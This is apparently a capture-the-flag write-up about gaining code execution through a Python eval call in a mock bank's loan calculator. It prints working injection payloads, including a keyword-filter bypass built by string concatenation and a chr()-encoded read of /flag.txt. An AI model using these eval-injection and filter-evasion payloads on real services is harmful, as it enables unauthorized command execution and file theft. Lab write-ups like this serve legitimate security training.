3v@l
ABC Bank's website has a loan calculator to help its clients calculate the amount they pay if they take a loan from the bank. Unfortunately, they are using an eval function to calculate the loan. Bypassing this will give you Remote Code Execution (RCE). Can you exploit the bank's calculator and read the flag?
We are presented by a website running on python ![[wappalyzer_image.png]]
Here the eval function takes an expression and then executes that expression.
So let’s try some known payloads:
__import__('os').popen('ls').read()But I have got this message
![[error_1.png]]
So there is a filter on certain keywords let’s try another trick by this payload.
__builtins__.__dict__['__im'+'port__']('o'+'s').popen('l'+'s').read()And we have successfully bypassed the filter.
![[suc_1.png]]
The flag is in /flag.txt
So tried many payloads to read this file but this one worked
open(chr(47)+'flag'+chr(46)+'txt').read()